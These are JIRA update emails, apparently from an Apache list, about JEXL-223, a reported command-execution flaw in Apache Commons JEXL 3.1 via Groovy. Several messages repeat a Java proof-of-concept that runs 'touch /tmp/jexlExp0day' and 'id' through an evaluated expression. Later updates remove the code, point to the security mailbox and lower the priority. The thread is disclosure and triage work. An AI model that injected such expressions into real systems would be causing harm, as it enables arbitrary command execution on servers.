[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
[
https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Bruno P. Kinoshita updated JEXL-223:
Description:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
0x02 POC
{code}
import java.io.IOException;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
JexlEngine jexl = new JexlBuilder().create();
// Create an expression
//String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
ProcessGroovyMethods n = new ProcessGroovyMethods();
System.out.println(n.execute("id").toString());
String jexlExp =
"new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
/tmp/jexlExp0day\")";
JexlExpression e = jexl.createExpression( jexlExp );
try {
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
// Create a context and add data
JexlContext jc = new MapContext();
jc.set("foo", jexlExp );
// Now evaluate the expression, getting the result
Object o = e.evaluate(jc);
System.out.println(o);
}
}
{code}
was:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
0x02 POC
import java.io.IOException;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
JexlEngine jexl = new JexlBuilder().create();
// Create an expression
//String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
ProcessGroovyMethods n = new ProcessGroovyMethods();
System.out.println(n.execute("id").toString());
String jexlExp =
"new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
/tmp/jexlExp0day\")";
JexlExpression e = jexl.createExpression( jexlExp );
try {
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
// Create a context and add data
JexlContext jc = new MapContext();
jc.set("foo", jexlExp );
// Now evaluate the expression, getting the result
Object o = e.evaluate(jc);
System.out.println(o);
}
}
> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
>Reporter: cnbird
>Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught
> groovy.
> 0x02 POC
> {code}
> import java.io.IOException;
> import java.util.List;
> import org.apache.commons.jexl3.JexlBuilder;
> import org.apache.commons.jexl3.JexlContext;
> import org.apache.commons.jexl3.JexlEngine;
> import org.apache.commons.jexl3.JexlExpression;
> import org.apache.commons.jexl3.MapContext;
> import org.codehaus.groovy.runtime.ProcessGroovyMethods;
> public class elExp {
> public static void main(String args[]) throws IOException {
> // Create or retrieve an engine
> JexlEngine jexl = new JexlBuilder().create();
> // Create an expression
> //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
> ProcessGroovyMethods n = new ProcessGroovyMethods();
> System.out.println(n.execute("id").toString());
> String jexlExp =
> "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
> /tmp/jexlExp0day\")";
> JexlExpression e = jexl.createExpression( jexlExp );
> tr
[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
[
https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
cnbird updated JEXL-223:
Description:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
0x02 POC
POC Report to Apache Security Email Address.
was:
0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.
0x02 POC
{code}
import java.io.IOException;
import java.util.List;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;
public class elExp {
public static void main(String args[]) throws IOException {
// Create or retrieve an engine
JexlEngine jexl = new JexlBuilder().create();
// Create an expression
//String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
ProcessGroovyMethods n = new ProcessGroovyMethods();
System.out.println(n.execute("id").toString());
String jexlExp =
"new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
/tmp/jexlExp0day\")";
JexlExpression e = jexl.createExpression( jexlExp );
try {
Process process = new ProcessBuilder("id").start();
} catch (IOException e1) {
// TODO Auto-generated catch block
e1.printStackTrace();
}
// Create a context and add data
JexlContext jc = new MapContext();
jc.set("foo", jexlExp );
// Now evaluate the expression, getting the result
Object o = e.evaluate(jc);
System.out.println(o);
}
}
{code}
> Apache Commons JEXL Expression Execute Command Vulnerabilitity
> --
>
> Key: JEXL-223
> URL: https://issues.apache.org/jira/browse/JEXL-223
> Project: Commons JEXL
> Issue Type: Bug
>Reporter: cnbird
>Priority: Critical
>
> 0x01 Summary
> Apache Commons JEXL Expression Execute Command Vulnerabilitity throught
> groovy.
> 0x02 POC
> POC Report to Apache Security Email Address.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] cnbird updated JEXL-223: Description: 0x01 Summary Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy. 0x02 POC POC Report to Apache Security Email Address secur...@apache.org. was: 0x01 Summary Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy. 0x02 POC POC Report to Apache Security Email Address. > Apache Commons JEXL Expression Execute Command Vulnerabilitity > -- > > Key: JEXL-223 > URL: https://issues.apache.org/jira/browse/JEXL-223 > Project: Commons JEXL > Issue Type: Bug >Reporter: cnbird >Priority: Critical > > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerabilitity throught > groovy. > 0x02 POC > POC Report to Apache Security Email Address secur...@apache.org. -- This message was sent by Atlassian JIRA (v6.3.15#6346)
[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Henri Biestro updated JEXL-223: --- Affects Version/s: 3.1 > Apache Commons JEXL Expression Execute Command Vulnerabilitity > -- > > Key: JEXL-223 > URL: https://issues.apache.org/jira/browse/JEXL-223 > Project: Commons JEXL > Issue Type: Bug >Affects Versions: 3.1 >Reporter: cnbird >Priority: Critical > > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerabilitity throught > groovy. > 0x02 POC > POC Report to Apache Security Email Address secur...@apache.org. -- This message was sent by Atlassian JIRA (v6.3.15#6346)
[jira] [Updated] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
[ https://issues.apache.org/jira/browse/JEXL-223?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Sebb updated JEXL-223: -- Priority: Minor (was: Critical) > Apache Commons JEXL Expression Execute Command Vulnerabilitity > -- > > Key: JEXL-223 > URL: https://issues.apache.org/jira/browse/JEXL-223 > Project: Commons JEXL > Issue Type: Bug >Affects Versions: 3.1 >Reporter: cnbird >Priority: Minor > > 0x01 Summary > Apache Commons JEXL Expression Execute Command Vulnerabilitity throught > groovy. > 0x02 POC > POC Report to Apache Security Email Address secur...@apache.org. -- This message was sent by Atlassian JIRA (v6.3.15#6346)
